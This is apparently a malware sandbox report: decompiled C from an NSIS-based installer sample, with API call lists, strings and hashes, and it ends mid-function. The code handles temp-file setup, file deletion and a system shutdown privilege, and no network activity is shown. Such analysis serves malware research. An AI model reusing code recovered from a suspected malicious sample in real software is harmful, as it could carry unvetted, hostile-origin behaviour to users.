						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F6A(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040666E(0x7b3800, _t198);
										L37:
										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E00403615(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x7a8b34 == _t188) {
														L77:
														_t119 =  *0x7a8b4c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A3B(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CCE(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8abc == _t188) {
												L51:
												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
												_v24 = E00403D1D(_t264);
												goto L68;
											}
											_t218 = E00405F6A(0x7b3000, _t188);
											if(_t218 < 0x7b3000) {
												L48:
												_t263 = _t218 - 0x7b3000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x7b3000) {
													_t189 = E00405C39(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x7b4800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C1C();
														} else {
															E00405B9F();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x7b3800;
														if( *0x7b3800 == 0) {
															E0040666E(0x7b3800, 0x7b4800);
														}
														E0040666E(0x7a9000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x7a9800 = _t143;
														do {
															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
															DeleteFileW(0x79f748);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(0x7b6800, 0x79f748, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E0040642E(_t201, 0x79f748, 0);
																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
																	_t152 = E00405C51(0x79f748);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E0040642E(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00406045(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040666E(0x7b3800, _t221);
												E0040666E(0x7b4000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x7b3000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E00403615(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E00403615(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x7a8b40 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}

0x00403654
0x00403655
0x0040365c
0x0040365f
0x00403666
0x00403669
0x0040367c
0x00403682
0x00403685
0x00403688
0x00403696
0x0040369e
0x004036a9
0x004036c2
0x004036c4
0x004036cc
0x004036cc
0x004036d7
0x004036d9
0x004036d9
0x004036ee
0x00403713
0x00403721
0x00403724
0x0040372b
0x00403732
0x00403732
0x0040372b
0x00403734
0x00403739
0x0040373a
0x00403746
0x0040374a
0x00403751
0x0040375f
0x00403764
0x0040376b
0x0040376f
0x00403773
0x00403775
0x00403775
0x00403773
0x0040377c
0x00403783
0x00403789
0x004037a1
0x004037b1
0x004037c3
0x004037ca
0x004037cc
0x004037cd
0x004037de
0x004037e2
0x004037e2
0x004037f5
0x004037f7
0x004038f1
0x004038f1
0x004038f4
0x004038f7
0x00000000
0x00000000
0x00403801
0x00403802
0x00403805
0x0040380e
0x0040380e
0x00403811
0x00403814
0x00403817
0x0040381a
0x0040381a
0x0040381a
0x0040381b
0x0040381f
0x004038df
0x004038e8
0x004038ea
0x004038ed
0x004038f0
0x004038f0
0x004038f0
0x00000000
0x00403825
0x00403826
0x00403827
0x0040382b
0x00403845
0x0040384c
0x0040385f
0x00403860
0x00403875
0x0040387a
0x0040387c
0x0040387e
0x0040389a
0x004038a1
0x004038b4
0x004038b5
0x004038ca
0x004038d0
0x004038d2
0x004038d4
0x004038dc
0x004038de
0x00000000
0x004038de
0x004038d8
0x004038da
0x004038ff
0x00403903
0x0040390c
0x00403911
0x00403917
0x00403922
0x00403924
0x00403929
0x0040392b
0x00403983
0x00403988
0x00403991
0x00403998
0x0040399b
0x00403b72
0x00403b72
0x00403b77
0x00403b80
0x00403b9d
0x00403c15
0x00403c15
0x00403c1d
0x00403c1f
0x00403c1f
0x00403c25
0x00403c25
0x00403bb4
0x00403bc0
0x00403bd1
0x00403bd8
0x00403bdf
0x00403bdf
0x00403be7
0x00403bf3
0x00403c01
0x00403c0c
0x00000000
0x00000000
0x00000000
0x00403bf5
0x00403bf5
0x00403bf6
0x00403bf8
0x00403bf9
0x00403bfa
0x00403bff
0x00403c0e
0x00403c10
0x00000000
0x00403c10
0x00000000
0x00403bff
0x00403bf3
0x00403b8a
0x00403b91
0x00403b91
0x004039a7
0x00403a4e
0x00403a4e
0x00403a5a
0x00000000
0x00403a5a
0x004039b8
0x004039c0
0x00403a12
0x00403a12
0x00403a18
0x00403a1f
0x00403a6d
0x00403a6f
0x00403a74
0x00403a76
0x00403a7e
0x00403a7e
0x00403a89
0x00403a95
0x00403a9b
0x00403a9d
0x00403b70
0x00403b70
0x00403b70
0x00000000
0x00403aa3
0x00403aa3
0x00403aa5
0x00403aa6
0x00403aaf
0x00403aa8
0x00403aa8
0x00403aa8
0x00403ab5
0x00403abd
0x00403ac4
0x00403acc
0x00403acc
0x00403ad9
0x00403ae5
0x00403aef
0x00403aef
0x00403af1
0x00403af8
0x00403b02
0x00403b0e
0x00403b14
0x00403b1a
0x00403b1d
0x00403b27
0x00403b2d
0x00403b2f
0x00403b33
0x00403b44
0x00403b4a
0x00403b4f
0x00403b51
0x00403b54
0x00403b5a
0x00403b5a
0x00403b51
0x00403b2f
0x00403b5d
0x00403b64
0x00403b64
0x00403b64
0x00403b64
0x00403b6b
0x00000000
0x00403b6b
0x00403a9d
0x00403a21
0x00403a24
0x00403a28
0x00403a2d
0x00403a2f
0x00000000
0x00000000
0x00403a3b
0x00403a46
0x00403a4b
0x00000000
0x00403a4b
0x004039c9
0x004039e1
0x004039f2
0x004039f3
0x004039f7
0x004039f9
0x00403a07
0x00403a0e
0x00000000
0x00000000
0x00000000
0x00403a0e
0x00403a10
0x00000000
0x00403a10
0x00403933
0x0040393f
0x00403944
0x00403949
0x0040394b
0x00000000
0x00000000
0x00403953
0x0040395b
0x0040396c
0x00403974
0x00403976
0x0040397b
0x0040397d
0x00000000
0x00000000
0x00000000
0x0040397d
0x00000000
0x004038da
0x00403883
0x00403885
0x00000000
0x00000000
0x00403887
0x0040388b
0x0040388f
0x00403896
0x00403896
0x00403896
0x00403896
0x00000000
0x00403896
0x00403891
0x00403894
0x00000000
0x00000000
0x00000000
0x00403894
0x0040382d
0x00403831
0x00403834
0x0040383b
0x0040383b
0x00000000
0x0040383b
0x00403836
0x00403839
0x00000000
0x00000000
0x00000000
0x00403839
0x00000000
0x00000000
0x00000000
0x00403807
0x00403807
0x00403808
0x00403809
0x00403809
0x00000000
0x00403807
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403669
GetVersionExW.KERNEL32(?), ref: 00403692
GetVersionExW.KERNEL32(0000011C), ref: 004036A9
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
OleInitialize.OLE32(00000000), ref: 00403783
SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
CharNextW.USER32(00000000), ref: 004037EF
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403922
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
lstrcatW.KERNEL32 ref: 0040393F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403953
lstrcatW.KERNEL32 ref: 0040395B
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
DeleteFileW.KERNELBASE(1033), ref: 00403988
lstrcatW.KERNEL32 ref: 00403A6F
lstrcatW.KERNEL32 ref: 00403A7E

Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22

lstrcatW.KERNEL32 ref: 00403A89
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403A95
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
CopyFileW.KERNEL32 ref: 00403B27
CloseHandle.KERNEL32(00000000), ref: 00403B54
ExitProcess.KERNELBASE(?), ref: 00403B72
OleUninitialize.OLE32 ref: 00403B77
ExitProcess.KERNEL32 ref: 00403B91
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
ExitProcess.KERNEL32 ref: 00403C25

Strings

TEMP, xrefs: 00403967
\Temp, xrefs: 00403939
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040365F
TMP, xrefs: 0040396F
NSIS Error, xrefs: 004037A7
Error launching installer, xrefs: 00403A18
C:\Users\user\AppData\Local\Temp\, xrefs: 00403917, 0040391C, 00403932, 0040393E, 0040394D, 0040395A, 00403966, 0040396E, 00403A6C, 00403A7D, 00403A88, 00403A94, 00403AA5, 00403AB4, 00403B6A
1033, xrefs: 00403983
SeShutdownPrivilege, xrefs: 00403BBA
~nsu, xrefs: 00403A67
.tmp, xrefs: 00403A83
Low, xrefs: 00403955
UXTHEME, xrefs: 00403734, 00403739, 0040373F

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-4036104658
Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00406045(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8b28 =  *0x7a8b28 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040666E(0x7a3f90, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F89(_t68);
					} else {
						lstrcatW(0x7a3f90, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040666E(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D32(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056D0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x7a8b28 =  *0x7a8b28 + 1;
										} else {
											E004056D0(0xfffffff1, _t68);
											E0040642E(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D7A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x7a3f90 - 0x5c;
					if( *0x7a3f90 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004069A4(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F3D(_t68);
							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056D0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056D0(0xfffffff1, _t68);
							return E0040642E(_t67, _t68, 0);
						}
						L30:
						 *0x7a8b28 =  *0x7a8b28 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d84
0x00405d89
0x00405d92
0x00405d95
0x00405d9d
0x00405da0
0x00405da3
0x00405dab
0x00405dad
0x00405dae
0x00000000
0x00405dae
0x00405db9
0x00405dbc
0x00405dbc
0x00405dbc
0x00405dc0
0x00405dd3
0x00405dda
0x00405ddf
0x00405de3
0x00405df3
0x00405de5
0x00405deb
0x00405deb
0x00405df8
0x00405dfc
0x00405e08
0x00405e0e
0x00405e13
0x00405e19
0x00405e24
0x00405e2a
0x00405e2c
0x00405e2f
0x00405ed9
0x00405ed9
0x00405edd
0x00405edf
0x00405edf
0x00405edf
0x00405edf
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e35
0x00405e35
0x00405e35
0x00405e3d
0x00405e5d
0x00405e65
0x00405e6a
0x00405e71
0x00405e8c
0x00405e91
0x00405e93
0x00405eb7
0x00405e95
0x00405e95
0x00405e98
0x00405eac
0x00405e9a
0x00405e9d
0x00405ea5
0x00405ea5
0x00405e98
0x00405e73
0x00405e79
0x00405e7b
0x00405e81
0x00405e81
0x00405e7b
0x00000000
0x00405e71
0x00405e3f
0x00405e47
0x00000000
0x00000000
0x00405e49
0x00405e51
0x00000000
0x00000000
0x00405e53
0x00405e5b
0x00000000
0x00000000
0x00000000
0x00405ebc
0x00405ec4
0x00405eca
0x00405eca
0x00405ed3
0x00000000
0x00405ed3
0x00405dfe
0x00405e06
0x00000000
0x00000000
0x00000000
0x00405dc2
0x00405dc2
0x00405dc4
0x00405ee4
0x00405ee6
0x00405ee9
0x00405f3a
0x00405f3a
0x00405f3a
0x00405eeb
0x00405eee
0x00405ef9
0x00405efe
0x00405f00
0x00000000
0x00000000
0x00405f03
0x00405f0f
0x00405f14
0x00405f16
0x00000000
0x00405f31
0x00405f18
0x00405f1b
0x00000000
0x00000000
0x00405f20
0x00000000
0x00405f27
0x00405ef0
0x00405ef0
0x00000000
0x00405ef0
0x00405dca
0x00405dcd
0x00000000
0x00000000
0x00000000
0x00405dcd

APIs

DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405DA3
lstrcatW.KERNEL32 ref: 00405DEB
lstrcatW.KERNEL32 ref: 00405E0E
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E14
FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E24
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
FindClose.KERNELBASE(00000000), ref: 00405ED3

Strings

\*.*, xrefs: 00405DE5
., xrefs: 00405E49
., xrefs: 00405E35

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$\*.*
API String ID: 2035342205-3749113046
Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004069A4 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069A4(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a4fd8;
			}

0x004069af
0x004069b8
0x00000000
0x004069c5
0x004069bb
0x00000000

APIs

FindFirstFileW.KERNELBASE(7556D4C4,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004069AF
FindClose.KERNEL32(00000000), ref: 004069BB

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC

Uniqueness

Uniqueness Score: -1.00%

Function 004040CB Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x7a1f70 = _t34;
					if(_t130 == 0x110) {
						 *0x7a8aa8 = _t127;
						 *0x7a1f84 = GetDlgItem(_t127, 1);
